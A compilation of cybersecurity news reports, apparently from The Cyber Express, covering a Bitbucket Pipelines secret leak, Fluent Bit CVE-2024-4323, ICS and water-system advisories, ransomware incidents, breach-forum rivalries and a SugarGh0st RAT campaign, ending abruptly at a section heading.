The Bitbucket Pipelines CI/CD service integrated within Bitbucket, uses artifact objects to store variables, files, and directories for use in subsequent stages of the build and testing process. Bitbucket's  "Secured Variables" feature is stated to store sensitive information like AWS keys securely as they are encrypted within the Bitbucket environment, preventing direct access and logging of their values. Developers employ the printenv command to store all environment variables, including secured variables, in a text file, which is then included in an artifact object. However, researchers from Mandiant discovered that this a critical flaw in this system causes artifact objects generated during pipeline runs to contain these secured variables in plaintext. As developers are not aware of that these secrets are exposed in artifact files, they may inadvertently cause secret values to be pushed to public repositories where threat actors can steal them. The researchers state that could threat actor could simply open the text file artifacts to view sensitive variables in plaintext, easily stealing authentication secrets that can be used to steal data or perform other malicious activity. The researchers noted instances where development teams used Bitbucket artifacts in web application source code for troubleshooting, unknowingly exposing plaintext values of secret keys. This led to the exposure of these keys on the public internet, allowing attackers to leverage them for unauthorized access.

Researchers Share Guide on Replicating BitBucket Vulnerability

The researchers shared step-by-step instructions on recreating the leak of secrets within a Bitbucket environment, as proof of the vulnerability. These steps included defining a secured variable, updating the bitbucket-pipelines.yml file to create an environment artifact, and downloading and accessing the artifact to view the exposed secrets. The researchers shared the following recommendations to protect BitBucket Pipeline secrets:

• Storing secrets in a dedicated secrets manager and then referencing those variables in the code stored in your Bitbucket repository.
• Closely reviewing Bitbucket artifact objects to ensure they are not exposing secrets as plain text files.
• Deploying code scanning throughout the full lifecycle of your pipeline to catch secrets stored in code before they are deployed to production.

However, the researchers stated that the findings were not an indictment against BitBucket but rather an observation of how quickly seemingly harmless behaviour could snowball into critical security problems. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Rockwell Automation has urged customers to immediately disconnect all industrial control systems facing the public Internet. The company cites increasing malicious activity amid mounting geopolitical tensions worldwide a reason for this recommendation.

The company advised customers to disconnect devices not specifically meant to face the public internet such as its cloud and edge offerings. Air gapping ICS systems from the public-facing internet can significantly reduce the attack surface of the organizations and protect their critical infrastructure from cyber threats, an advisory from the company suggested.

Rockwell Automation is a major provider of ICS products that has been in business for nearly a decade. Headquartered in Milwaukee, Wisconsin the industrial automation giant provides services for Architecture and Software segments meant for controlling the customer's industrial processes as well as Industrial Control Product Solution segments such as intelligent motor control, industrial control products, application expertise, and project management capabilities. "Due to heightened geopolitical tensions and increased adversarial cyber activity globally, Rockwell Automation is issuing this notice urging all customers to take immediate action to assess whether they have devices facing the public internet and, if so, to urgently remove that connectivity for devices not specifically designed for public internet connectivity," Rockwell Automation stated.

Rockwell Automation Discourages Remote Connections to ICS

In its latest security advisory, Rockwell Automation stressed that network defenders should never configure ICS devices to allow remote connections from systems outside the local network. It advised organizations that disconnecting these systems from the public-facing internet could significantly reduce their attack surface. This action prevents threat actors from gaining direct access to vulnerable systems that may not yet have been patched against security vulnerabilities, thus protecting internal networks from potential breaches. Rockwell Automation has also cautioned customers to implement necessary mitigation measures against several security vulnerabilities in its ICS devices. These vulnerabilities, identified by their CVE IDs, span across several Rockwell products like Logix Controllers, Studio 5000 Logix Designer, and FactoryTalk platforms. The list of these vulnerabilities is as follows:

• CVE-2021-22681: Rockwell Automation Logix Controllers (Update A)
• CVE-2022-1159: Rockwell Automation Studio 5000 Logix Designer
• CVE-2023-3595: Rockwell Automation Select Communication Modules
• CVE-2023-46290: Rockwell Automation FactoryTalk Services Platform
• CVE-2024-21914: Rockwell Automation FactoryTalk View ME
• CVE-2024-21915: Rockwell Automation FactoryTalk Service Platform
• CVE-2024-21917: Rockwell Automation FactoryTalk Service Platform

Broader Efforts and Mitigation Actions for ICS Security

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also issued an alert advising Rockwell customers to implement the recommended security measures as these products are in use at several critical infrastructure organizations across the country. Earlier in September 2022, the agency along with the NSA had issued recommendations and a "how-to guide" for reducing exposure across ICS and related operational technologies. The urgency of enhancing ICS security is further highlighted by the collaborative efforts of multiple U.S. federal agencies, including the NSA, FBI, and CISA, along with cybersecurity agencies from Canada and the U.K. These agencies have previously issued several public statements about the threats posed by hacktivists targeting critical infrastructure operations through unsecured OT systems. CISA has already recommended defensive measures on industrial control systems such as minimizing network exposure, isolating control system networks, and securing remote access through the implementation of Virtual Private Networks (VPNs). The present administration also issued the 2021 national security memorandum instructing CISA and NIST to develop cybersecurity performance goals for critical infrastructure operators as part of the broader initiatives in recent years to secure critical infrastructure within the United States. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The U.S. Environmental Protection Agency (EPA) issued a stern warning on May 20th, 2024, highlighting the escalating cyber threats to the nation's drinking water systems while outlining stricter enforcement measures to protect water-related critical infrastructure. The Environmental Protection Agency is an independent U.S. agency responsible for protecting human health and the environment. These responsibilities include making sure that Americans have clean air, land and water and overseeing the implementation of federal laws related to these matters. The alert comes as part of a wider government initiative to strengthen national security and address vulnerabilities in critical infrastructure.

Environmental Protection Agency Concerned By Recent Inspection Results

Recent EPA inspections have revealed alarming cybersecurity gaps in a majority of water systems. More than 70% of inspected systems were found to be non-compliant with the Safe Drinking Water Act, with some exhibiting severe vulnerabilities such as unchanged default passwords and single logins. These weaknesses leave systems susceptible to cyberattacks, which have been observed by the agency to have become increasingly more frequent and severe in recent times. In response to the escalating threat, the EPA is ramping up its enforcement activities under the Safe Drinking Water Act. This includes increasing the number of inspections, initiating civil and criminal enforcement actions where necessary, and ensuring that water systems are adhering to the requirements of risk assessment and emergency response planning. The EPA is also working closely with federal and state partners, including the Cybersecurity and Infrastructure Security Agency (CISA) and the FBI, to fortify the nation's water systems against cyber threats. This collaboration includes providing technical assistance, guidance, training, and resources to help water systems implement crucial security measures. "Defending our nation's water supply is central to our mission at the EPA," emphasized Deputy Administrator Janet McCabe. We are leveraging all available tools, including enforcement, to shield our water from cyber threats. The alert reflects the current government's dedication to dealing with the urgency of cyber threats to critical infrastructure, and ensuring that water systems are adequately equipped to counteract these risks to public health.

EPA's Key Recommendations for Water Systems

The EPA's enforcement alert warned that cyberattacks on water systems could have devastating consequences, potentially disrupting treatment, distribution, and storage of water, damaging critical infrastructure, and even manipulating chemical levels to hazardous amounts. The alert added that small water systems are not exempt from this threat, as recent attacks by nation-state actors have targeted systems of all sizes. The EPA, Cybersecurity and Infrastructure Security Agency (CISA), and the FBI strongly recommend that water systems implement the following cybersecurity measures:

• Reduce exposure to the public-facing internet.
• Conduct regular cybersecurity assessments.
• Immediately change default passwords.
• Conduct an inventory of operational technology (OT) and information technology (IT) assets.
• Develop and practice cybersecurity incident response and recovery plans.
• Backup OT/IT systems.
• Reduce exposure to vulnerabilities.
• Conduct cybersecurity awareness training.

The EPA and CISA are offering free assistance to water systems to help them implement these crucial changes. Utilities can contact the EPA through its Cybersecurity Technical Assistance Form or email CISA Cyber Hygiene Services at vulnerability@cisa.dhs.gov with the subject line 'Requesting Cyber Hygiene Services'. [caption id="attachment_69563" align="alignnone" width="184"] Source: epa.gov[/caption] The EPA's heightened enforcement measures reflect the urgency of the threat facing the nation's water systems. By working together with federal and state partners and implementing recommended security practices, water systems can significantly enhance their resilience and protect this critical resource from malicious threat actors. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.  

A critical security vulnerability(CVE-2024-4323) referred to as "Linguistic Lumberjack," has been found within Fluent Bit, a widely-used logging and metrics tracking utility employed within major cloud infrastructure services. Fluent Bit is an open-source, lightweight data collector and processor service designed to handle large volumes of log data from various sources on Windows, Linux, and macOS operating systems. Its scalability and ease of use make it a preferred choice for usage in cloud environments and sees at least 10 million daily deployments. The Linguistic Lumberjack vulnerability could potentially enable attackers to execute Denial of Service (DoS) attacks, disclose sensitive information, or even gain remote code execution (RCE) capabilities.

Linguistic Lumberjack Vulnerability

The Linguistic Lumberjack vulnerability stems from a heap buffer overflow flaw in Fluent Bit's built-in HTTP server, particularly in how it handles the /api/v1/traces endpoint. This endpoint enables administrators to configure how FluentBit handles its tracing and monitoring operations. [caption id="attachment_69409" align="alignnone" width="2040"] Source: www.fluentbit.io[/caption] However, due to a lack of proper validation of input types, sending non-string values (such as integers) in the "inputs" array of a request can lead to memory corruption. The code incorrectly assumes these values to be valid MSGPACK_OBJECT_STRs. Through the intentional passing of integer values in the "inputs" array field, an attacker can trigger various memory corruption issues, including heap buffer overflows and crashes due to attempts to write to protected memory regions. In a controlled environment, Tenable researchers successfully exploited the vulnerability to trigger service crashes (DoS) and the leak of adjacent memory contents, which could potentially include sensitive information in a real-life scenario. Under specific environmental factors, attackers could even exploit the vulnerability to cause denial-of-service conditions or remote code execution. [caption id="attachment_69402" align="alignnone" width="2040"] Source: www.fluentbit.io[/caption] The Fluent Bit utility service is deeply integrated into major Kubernetes distributions from Amazon AWS, Google GCP, and Microsoft Azure. Beyond cloud providers, Fluent Bit is also relied upon by several major tech companies including Cisco, VMware, Intel, Adobe, and Dell. The utility is also known to be used by several major cybersecurity companies.

Mitigation and Remediation

The critical memory corruption vulnerability was introduced in version 2.0.7 of Fluent Bit and exists up to  version 3.0.3 of the software released on April 27th 2024. The issue has been fixed in the main source branch of Fluent Bit, with the fix expected to be included in the release of the upcoming version 3.0.4 of the software. For Linux, packages containing the fix are already available for download. For users unable to upgrade immediately, the researchers have recommended a review of existing access to Fluent Bit's monitoring API while restricting access to authorized users and services only, and to disable the endpoint if it is not in use. For organizations relying on cloud services known to utilize Fluent Bit, reaching out to the cloud provider to ensure timely updates or mitigations is advised. The researchers have notified the bug's existence to major cloud providers on May 15, 2024, to allow them to initiate their own internal responses. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Secretforums, a data leaks forum, announced that it would bestow former BreachForums members with ranks similar to what they had previously held on the seized forums. The BreachForums domain had recently been taken down in a joint-law enforcement operation, with its main admin Baphomet reportedly being arrested. After its seizure, several other individuals and groups have been vying for control and credibility over the displaced cybercriminal community.

Secretforums Admin Alleges Ex-BreachForums Admin Was Informer

While the veracity of these claims are unknown and doubted, the SecretForums and former owner of Blackforums stated his belief that Baphomet, the admin and owner of BreachForums following its previous take down, was an informer to law enforcement. The Secretforums admin alleged that Baphomet expressed strong interest in being involved with the infrastucture management of Blackforums and had been attempting to influence him towards the set up of a bastion server to assist with logs and security issues. [caption id="attachment_69355" align="alignnone" width="433"] Source: Secretforums Telegram[/caption] The Secretforums admin claimed that that the requests had never been fulfilled with full access never being granted to anyone, including the other admins of Secretforums and that he was solely responsible for the forum's infrastructure and security. Additionally, the admin alleged that no logs were ever saved from either site aside from email addresses, usernames and password hashes for essential site functionality. The earlier allegations along with the offer to grant similar roles to ex-BreachForums members may be part of a concerted effort to gain traction among the seized forum's former members and contributors. The admin also cast doubt on the new admin ShinyHunters and their efforts to rebuild BreachForums through the use of older backups. [caption id="attachment_69354" align="alignnone" width="555"] Source: Secretforums Telegram[/caption] The admin directed ex-members to reach out to a specified handle with proof of their previous ranks along with their Secretforums username to be receive similar ranks, through a message on the Secretforums Telegram channel.

USDoD Shares Updates on 'Breach Nation' Details

In addition to the Secretforums development, the threat actor USDoD shared further details about his attempts towards to build Breach Nation in a long post on X(Twitter). The threat actor claimed that neither he nor Breach Nation were affiliated with BreachForums' staff. [caption id="attachment_69353" align="alignnone" width="447"] Source: X.com (@EquationCorp)[/caption] USDoD attempted to differentiate Breach Nation from BreachForums in stating that the new forum would not feature a porn section, and restrict itself to upload of databases and leads as a primary focus while not allowing for the upload of files such as combos and stealer logs 'to ensure the best quality content'. Additionally the site would be organized into "High-Quality Leaks" for databases originating from First World countries, and "Secondary Leaks" for leaks stemming from other countries with the lead section separated into its own category. The site would feature a threat intelligence section to facilitate discussions on the subject as the threat actor felt there was a range of opportunities within the scope of the topic. USDoD stated that he was working on obtaining the CDN records from the defunct BreachForums, and cited the presence of a market, functioning escrow system, credit system as similarities to the old forums. However, he also mentioned additional changes that might occur such as the option to use the credit system to boost ranks within the forums and the absence of categories such as software and cracking in the initial stages of the forum where he would function as the sole administrator. The forum would initially be public with a clearnet domain, but would later shift to invite-only and also feature an alternate onion address. These efforts made on both Secretforums and Breach Nation to bolster forum development and appeal to  former BreachForums members highlights the competitiveness between various cybercriminal forums, underlying fears of forum compromise by law enforcement and the recognition of the rank/credit system as a way to gain additional engagement by allowing contributors to build a reputation within the community. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Threat actors USDoD and SXUL have claimed responsibility for an alleged major prison data breach  compromising of approximately 70 million rows of sensitive data linked to a criminal database, on LeakBase. While no further details were shared about the specific prison(s) involved, the threat actor shared sample data allegedly stemming from the claimed prison data breach.

Prison Data Breach Allegedly Includes Wide Array of Data

The prison data leak reportedly includes unique identification numbers, Social Security Numbers, full names, dates of birth, birth states, physical features, Home and alternate addresses, offense codes, offense dates, offense descriptions, court dispositions, conviction dates and dates of charges. The data had been shared in .csv format and is stated at being 3GB in file size when compressed and 22GB while uncompressed. This data is stated to consist of data from the year 2020 to 2024 and the sample data purporting to be details of at least three convicted individuals were shared. [caption id="attachment_69318" align="alignnone" width="1359"] Source: X.com (@DarkWebInformer)[/caption] While this marks the first time the threat actor USDoD has posted on LeakBase, the threat actor claimed they would use it only until they got their own forum active. USDoD had earlier announced the creation of a new leak forum, choosing to name it 'Breach Nation'. While the details of the attack and their alleged involvement is unknown, USDoD credited the threat actor SXUL for the prison data breach. In a later reply to the thread, he clarified that the breach stemmed from the United States.

USDoD Known to Target Government Related Data

The threat actor has frequently targeted government, defense/law-enforcement contractors and geo-political entities, with most of his operations primarily focused on the United States as noticed during the #RaidAgainstTheUS campaign. The incidents under the two-day release campaign in February 2022 included a a US Strategic Command database, US Defense Technical Information Center database, an Army Special Operations Center of Excellence database, a US Central Command database, a U.S. Special Operations Command database, and a Lockheed Martin database. While believed to harbor Pro-Russian ties or sympathies, he has denied any involvements with governments or political entities. This denial included a statement of him claiming he had refused an offer to sell compromised intel to the Iranian government after being approached by them. Interestingly, the threat actor maintained Russia as among the nations he would refuse to target along with Iran. USDoD is known to rely on social engineering techniques to break into high-profile agencies or entities, and his previous attacks have included the FBI's private partner InfraGard, leak of Airbus data on the 22nd anniversary of the 9/11 attacks, NATO Cyber Center Defense, and CEPOL. USDoD has disclosed that the use of tools such as Zoominfo to identify and research targets as well as their importance within  the military and defense sector. Within the the Airbus post, the threat actor also threatened attacks on Lockheed martin, Raytheon and other entire defense contractors. Recently, the actor claimed attacks on entities such as the unconfirmed Chinese Communist Party data leak and the Bureau Van Dijk(which has since then been refuted), since then the threat actor seems to be working on setting up their own content delivery network to host leak files as well as their own data leak forum. While the prison data breach remains unconfirmed, the threat actor's previous involvement in high-profile social engineering attacks remains a cause of concern for future operations and claims along with potential consequences stemming from the alleged prison member data leak. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The University of Siena, a distinguished Italian academic institution established in 1240, is currently grappling with a significant cybersecurity incident. The LockBit 3.0 ransomware group has claimed responsibility for the attack that has disrupted multiple university services, leading to the temporary suspension of its systems. As one of Europe's oldest universities, Siena offers extensive programs in sciences, medicine, engineering, economics, and social sciences. In response to the crisis, the university has initiated recovery operations with the support of the Italian National Cybersecurity Agency (Agenzia per la Cybersicurezza Nazionale), although the involvement of LockBit has not yet been officially confirmed.

University of Siena Data Breach and Ransom Demand

According to the new LockBit 3.0 leak site, the group has allegedly exfiltrated 514 GB of sensitive data from the university's systems. Screenshots of the stolen data were shared on both the leak site as well as the group's Telegram channel. The stolen data reportedly includes: Financial Documents including :

• Budgets detailing expenses by month from 2020 to 2024.
• Board-approved documents regarding project and tender financing from 2022 to 2026, including funding amounts.
• Documents related to extraordinary construction works, contractor appointments, and a €1.7 million budget allocation.

Confidential Information including:

• Non-disclosure agreements for the upcoming WineCraft 2024 event.
• Tender design contracts for 2023, including contract budgets.
•  Contractor's investment plan for 2022, encompassing expenses, rents, and the overall financial plan.

[caption id="attachment_69276" align="alignnone" width="803"] Source: LockBit leak site[/caption] [caption id="attachment_69277" align="alignnone" width="323"] Source: LockBit Telegram[/caption] With a looming ransom deadline set for May 28, the university is racing against limited time to deal with the consequences of the digital assault. Earlier on May 10th, the University of Siena acknowledged the cyber attack on its website, informing the public about the suspension of various of its services due to a 'massive cyber attack by an international group of hackers.'

University's Response and Restoration Efforts

The website acknowledged that several of its services including its website for international admissions, ticketing services, and payment management platforms had been affected and were taken down as a preventative measure. The notice assured users that payments made prior to the attack had been registered despite a temporary disconnect between the website's payment confirmation and application processing. [caption id="attachment_69271" align="alignnone" width="2800"] Source: www.apply.unisi.it[/caption] However, the notice also stated that the volume of assistance requests being received from international candidates following the incident was found to be overwhelming to its staff. The notice advised students to refrain from sending multiple inquiries, promising to respond as soon as possible. The notice provided separate advice to both candidates who had already paid university fees but did not submit applications and candidates who submitted admission applications but had not yet paid their application fees. The site stated in bold that students who fall in the above mentioned categories should avoid unnecessary contact with staff, while apologizing for the inconvenience caused by the issue. The attack on the University of Siena is one of the largest attacks claimed by the LockBit group following the recent disruption to its activities after its coordinated takedown by law enforcement groups. The incident underscores the group's persistent efforts to remain active in their efforts despite these operational challenges, while emphasizing their ability to still cause massive disruption to victims. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The threat actor and the owner of the English language cybercrime forum LeakBase, Chucky, has leaked a database allegedly stolen from the the Spanish IT services company Knowmad Mood. The Knowmad Mood data breach reportedly contains sensitive employee data. Knowmad Mood who recently shifted it's name and branding from the earlier name atSistemas, had been established in 1994 and provides consulting and software development services, with offices present in Spain, Italy, Portugal, the United States, Morocco, the United Kingdom, and Uruguay. LeakBase is a data leak forum that gained popularity as an alternative source for sharing hacked data or leaked databases and credentials following the 2023 BreachForums takedown.

Knowmad Mood Data Breach Stems from CRM System

The stolen data was allegedly exported from the company's CRM system, and Chucky shared screenshots to further cement his responsibility for the Knowmad mood data breach. The screenshots appeared to reveal a cache of sensitive files, including HTML, Excel, and Word documents. [caption id="attachment_69238" align="alignnone" width="1447"] Source: LeakBase Forum[/caption] Further, a CSV file had been shared and was stated to contain workplace information and performance metrics of employees, including fields such as names, email addresses, h.input, h.exit, effective h., STE, STE Percentage, and h.STE. The leaked data raises serious concerns about the security measures in place at Knowmad mood, and the potential impact it may have on employees and customers. The Cyber Express team has reached out to Knowmad Mood for further information or updates on the alleged data breach claims; however, no updates were received at the time of writing.

Earlier Activities of Threat Actor Chucky

The threat actor Chucky, admin of LeakBase has previously operated under the names LeakBase, Sqlrip, and Chuckies on various underground forums. After the mid-March 2023 shutdown of BreachForums, the threat actor's own forum LeakBase started gaining traction among the cybercriminal community. Chucky had been a regular participant and contributor on BreachForums, sharing breached databases and selling admin/unauthorized access to websites while also being the top active poster on their own LeakBase leak forums. The threat actor had disclosed to Cyble researchers that their primary tactic involved a customized brute forcing technique. While the researchers confirmed that the technique might serve as a plausible method for the threat actor's data breach attacks, the full tactics, techniques, and procedures (TTPs) employed by the TA remained unconfirmed. Chucky previously claimed responsibility for massive leaks from sources such as the Indian government's Swachh City initiative, OnePlus-Oppo & Realme in a data breach attack affecting users from Thailand, Gamekaking and American automotive digital marketing service Purecars . Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Researchers have identified a recent cyber espionage campaign by a China-linked threat actor dubbed "UNK_SweetSpecter," which aims to harvest generative artificial intelligence (AI) secrets from experts in the United States. The threat actor targets AI experts using a remote access trojan (RAT) malware called SugarGh0st.  SugarGh0st infiltrates the systems of a highly selective list of AI experts from different verticals such as tech companies, government agencies and academic institutions. The SugarGh0st RAT was originally reported in November 2023 but was observed in only a limited number of campaigns. It is a custom variant of the Gh0st RAT, a tool that was first publicly attributed to a Chinese threat group in 2008. Researchers suspect that the threat actor UNK_SweetSpecter is likely of Chinese origin.

Spear-Phishing SugarGh0st Campaign Targets AI Experts

Proofpoint researchers discovered that the targets of this campaign were all connected to a leading US-based AI organization and were lured with distinct AI-themed emails. The infection chain began with a seemingly innocuous email from a free account, claiming to seek technical assistance with an AI tool. The attached zip file contained a shortcut file (LNK) that deployed a JavaScript dropper upon access. This dropper included a decoy document, an ActiveX tool for sideloading, and an encrypted binary, all encoded in base64. The infection chain ended with SugarGh0st RAT being deployed on the victim's system and communication being established with the attacker's command and control server. Analysis of the attack stages revealed that the group had shifted their C2 communications from an earlier domain to a new one, indicating their detection evasion motives. While the malware itself is relatively unsophisticated in it's attack chain, the targeted nature of AI the campaign makes it significant, the researchers noted. The SugarGh0st RAT was previously used in targeted campaigns in Central and East Asia.

Potential Motivations, Attribution and Context

Although direct attribution to a specific nation-state is challenging, researchers concluded the presence of Chinese language artifacts and the precise targeting of AI experts suggest a possible link to China-linked threat actors. The campaign also coincides with the U.S. government's efforts to restrict Chinese access to generative AI technologies. The new regulations established by the Biden administration would likely restrict the export of AI models, and their data to countries it deemed hostile to U.S. interests, such as Russia, China, North Korea and Iran. The Chinese Embassy labeled the action as economic coercion and unilateral bullying. Earlier in February, Microsoft reported observing Chinese, Russian, North Korean and Iranian threat actors' attempting to leverage AI tools from big tech AI companies like OpenAI for their campaigns. The report indicated that Chinese threat actors used AI tools to boost their technical prowess such as the development of tools and phishing content, while the Russian threat actors were observed researching  satellite and radar technologies possibly related to the war in Ukraine. With the regulatory efforts aimed at restricting proprietary/closed-source AI models, researchers theorize that this campaign is likely an attempt by a China-affiliated actor to harvest generative AI secrets via cyber theft before the policies are enacted. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

While the recent takedown of BreachForums by the FBI, in collaboration with international law enforcement agencies, marked a significant victory against cybercrime. Less than 24 hours after this major blow, the renowned threat actor known as USDoD made an announcement stating his plans to resurrect the forum's community, demonstrating the relentless nature of the cyber underworld. BreachForums had long been a central marketplace for cybercriminals, facilitating the trade of stolen data and hacking tools. Its sudden removal from the dark web was a monumental achievement for law enforcement, akin to dismantling a major illicit market. However, the cybercriminal community's response was swift and defiant as demonstrated by the alleged claim by ShinyHunters, one of the leftover administrators just a day later that the site domain itself had been recovered. Alongside the possible domain recovery, USDoD also separately pledged to rebuild and improve upon BreachForums through a newer competitive forum, promising a new beginning for the infamous community.

USDoD Announces Creation of Breach Nation Forum

In a bold statement following the takedown, USDoD assured the community that he had already been working on rebuilding BreachForums, promising that the forum's legacy and user data would be preserved. He emphasized his dedication to creating a new community, presenting the takedown as not the end but an opportunity for a fresh start. [caption id="attachment_69063" align="alignnone" width="523"] Source: X.com (@EquationCorp)[/caption] His announcement also detailed the allocation of resources and infrastructure to support the new forum. The new domains, breachnation.io and databreached.io, are set to launch on July 4, 2024, symbolically coinciding with Independence Day. This new community, dubbed "Breach Nation," aims to offer enhanced features and security. [caption id="attachment_69064" align="alignnone" width="544"] Source: X.com (@EquationCorp)[/caption] USDoD’s vision for BreachForums 3.0 includes robust infrastructure, with separate servers to ensure optimal performance and security. He has assured the community that he is not driven by profit and aims to offer an upgraded member rank to the first 200,000 users as a token of goodwill. He acknowledged the challenges ahead, including potential opposition from law enforcement as well as possible competition from the BreachForums administrator ShinyHunters. He also addressed concerns about compromise within the forum's administration, stating that he would initially manage it alone to ensure security and build trust.

USDoD's Earlier Activities

USDoD's bold promise to create the new Breach Nation forum highlights the persistence of the cybercriminal underworld. The threat actor is a notable figure in the cybercriminal community and was previously known as NetSec on RaidForums. USDoD is known to employ sophisticated social engineering and impersonation techniques to penetrate secure systems. His activities included exposing data related to several high-profile organizations such as InfraGard, Airbus, and several, the U.S. Army, NATO Cyber Center, and CEPOL. He also claimed responsibility for alleged data leaks from the defense contractor Thales as well the Communist Party of China. A newer CDN created by USDoD was first publicized around the same time as the alleged China data leak, this CDN is stated to be incorporated for the new domain's infrastructure and seemingly being reworked and shifted to a new domain. [caption id="attachment_69068" align="alignnone" width="566"] Source: X.com (@EquationCorp)[/caption] While the potential impact of the new forum remains unclear, it may be a key development to watch in the ongoing struggle between law enforcement and cybercrime in the aftermath of the BreachForums domain seizure. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The Norwegian National Cyber Security Centre (NCSC) has issued an recommendation advising organizations for the replacement of SSLVPN and WebVPN solutions with more secure alternatives, due to the repeated exploitation of vulnerabilities in edge network devices in the past that allowed attackers to breach corporate networks. The National Cyber Security Centre (NCSC), a sub-division of the Norwegian Security Authority functions as Norway's primary liaison for coordinating national efforts to prevent, detect, and respond to cyber attacks, as well as providing strategic guidance and technical support to enhance the overall cyber security posture of the country. This includes conducting risk assessments, disseminating threat intelligence, and promoting best practices in both the public and private sector. The NCSC's guidance is aimed at enhancing the security posture of organizations, particularly those within critical infrastructure sectors, by advocating for the transition to more robust and secure remote access protocols.

Replacement of SSLVPN and WebVPN With Secure Alternatives

The NCSC's recommendation is underpinned by the recognition that SSL VPN and WebVPN, while providing secure remote access over the internet via SSL/TLS protocols, have been repeatedly targeted due to inherent vulnerabilities. These solutions create an "encryption tunnel" to secure the connection between the user's device and the VPN server. However, the exploitation of these vulnerabilities by malicious actors has led the NCSC to advise organizations to migrate to Internet Protocol Security (IPsec) with Internet Key Exchange (IKEv2). IPsec with IKEv2 is the NCSC's recommended alternative for secure remote access. This protocol encrypts and authenticates each packet of data, using keys that are refreshed periodically. Despite acknowledging that no protocol is entirely free of flaws, the NCSC believes that IPsec with IKEv2 significantly reduces the attack surface for secure remote access incidents, especially due to its reduced tolerance for configuration errors compared to SSLVPN. The NCSC emphasizes the importance of initiating the transition process without delay. Organizations subject to the Safety Act or classified as critical infrastructure are encouraged to complete the transition by the end of 2024, with all other organizations urged to finalize the switch by 2025. The recommendation to adopt IPsec over other protocols is not unique to Norway; other countries, including the USA and the UK, have also endorsed similar guidelines, underscoring the global consensus on the enhanced security offered by IPsec with IKEv2. As a preventative measure, the NCSC also recommended the use of 5G from mobile or mobile broadband as an alternative in locations where it was not possible to implement an IPsec connection.

Recommendation Follows Earlier Notice About Exploitation

Last month, the Norwegian National Cyber Security Centre had issued a notice about a targeted attack campaign against SSLVPN products in which attackers exploited multiple zero-day vulnerabilities in Cisco ASA VPN used to power critical infrastructure facilities. The campaign had been observed since November 2023. This notice intended primarily towards critical infrastructure businesses warned that while the entry vector in the campaign was unknown, the presence of at least one or more zero-day vulnerabilities potentially allowed external attackers under certain conditions to bypass authentication, intrude devices and and grant themselves administrative privileges. The notice shared several recommendations to protect against the attacks such as blocking access to services from insecure infrastructure such as anonymization services (VPN providers and Tor exit nodes) and VPS providers. Cisco released important security updates to address these vulnerabilities. The earlier notice also recommended that businesses switch from from the SSLVPN/clientless VPN product category to IPsec with IKEv2, due to the presence of critical vulnerabilities in such VPN products, regardless of the VPN provider. The NCSC recommends businesses in need of assistance to contact their sector CERT or MSSP. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The Rockford Public School Disttrict in Michigan has successfully restored its systems after a ransomware attack caused significant disruption earlier this week, forcing the shutdown of its computer, email, and phone systems. Despite acting swiftly to contain the Rockford Public Schools ransomware attack as an attempt to ensure the safety of its students and staff, the measures also forced the school district to resort to traditional pen and paper-based offline methods for schooling. A day after the incident, the district superintendent confirmed the isolation of the attack and the restoration of systems, indicating that students and staff could operate as normal. Established in 1884, Rockford Public Schools is a prominent educational institution in Rockford, Illinois. With 45 schools catering to around 27,766 students, it spans across portions of Kent County and serves parts of Plainfield, Algoma, Courtland, Cannon, Grattan, and Oakfield Townships. The district's consolidation in the late 1950s brought together several neighborhood school systems, and it expanded into 45 schools serving approximately 27,766 students.

Systems Restored After Rockford Public Schools Ransomware Attack

On the morning of the incident, district leaders were alerted to computer system failures within the school district disrupting its phones and internet services. While it was initially suspected to be a vendor issue, it soon became clear that the district was struck by a ransomware attack after ransom notes were discovered on various printers. Superintendent Steve Matthews promptly ordered the shutdown of all network connections, including Wi-Fi, to contain the threat. He anticipated that it would take at least a couple of days for the district to return to normal operations. The official website of the school district displayed emergency phone numbers for various buildings within the school district during the time of the attack. [caption id="attachment_68941" align="alignnone" width="1768"] Source: rockfordschools.org[/caption] Despite the attack, there was no immediate threat to student safety. Classes continued as usual, albeit with a return to traditional, technology-free teaching methods. Superintendent Matthews reassured that security systems for school doors remained functional, and emergency cell phones were made available for parental contact. The FBI was also involved in the investigation, working alongside district staff to assess the extent of the breach.  Superintendent Matthews acknowledged the initial challenge but noted that staff were quickly adjusting to the incident. Students reported a unique experience of engaging in learning without digital tools, while some found the situation disconcerting. Parents were informed about the situation through emergency communication channels. While some parents chose to pick up their children early, the overall response was one of cautious adaptation. Following the preventative measures, the public school district restored its computer systems 24 hours later, with the district superintendent stating that the incident had been isolated and contained. The school issued a letter to parents, indicating that says students and staff could resume using district-provided school equipment or their own personal devices.

Expert Indicates Educational Institutes as Common Ransomware Target

